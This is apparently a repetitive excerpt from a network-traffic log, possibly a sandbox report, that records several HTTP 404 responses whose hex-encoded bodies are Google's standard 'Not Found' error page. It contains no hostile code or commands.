Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:06 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:06 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:06 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:06 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:06 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:06 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:10 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 